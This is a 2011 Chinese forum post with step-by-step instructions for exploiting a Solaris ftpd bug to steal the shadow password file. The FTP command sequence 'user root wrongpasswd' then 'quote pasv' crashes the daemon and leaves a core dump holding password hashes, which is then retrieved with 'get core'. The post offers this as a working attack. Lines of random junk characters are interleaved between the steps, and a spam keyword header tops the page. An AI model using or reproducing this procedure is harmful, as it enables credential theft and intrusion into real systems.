天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022
汶上信息港
標(biāo)題:
如何用FIP獲取shadow口令文件
[打印本頁(yè)]
作者:
雜七雜八
時(shí)間:
2011-1-12 21:01
標(biāo)題:
如何用FIP獲取shadow口令文件
該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG,使得用戶可以獲得該機(jī)的口令文件。具體過(guò)程如下:
! Q6 x5 A# ^' `3 B9 G
% ~) R. b& ~ W$ Y5 H( U
1.通過(guò) ftp 正常登錄到目的主機(jī)上
, h5 m6 S' j% a6 _" @; z
8 R; J. Y3 A. O' e
2.輸入如下命令序列:
: s5 o5 `- [# Z ^8 F
2 h+ P, {/ D6 y% I/ p
ftp> user root wrongpasswd
! Y: G# W9 w/ L* g* G" e
. r/ L0 O! @: Z5 C6 L+ A
ftp> quote pasv
- ]' e; m/ |0 l" q q6 a F4 w+ r
- v- B1 o7 G* K+ w+ y/ ~
3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core,口令文件就包含在這個(gè)core中。
! u7 l9 W% H2 V) ^
1 p$ X5 {: H5 S H/ F) ^
4.再次進(jìn)入FTP >get core
$ Z; [8 M0 W! P
: I# t2 @8 [( w: v0 i! B
補(bǔ)充:雖然在core只有一部分shadow,但是對(duì)于系統(tǒng)來(lái)說(shuō)已經(jīng)是致命的打擊了
! j; j; z' P+ {. n
8 h" l4 M& [3 E+ d8 L. h e j+ c
歡迎光臨 汶上信息港 (http://www.vancelump.com/)
Powered by Discuz! X3.5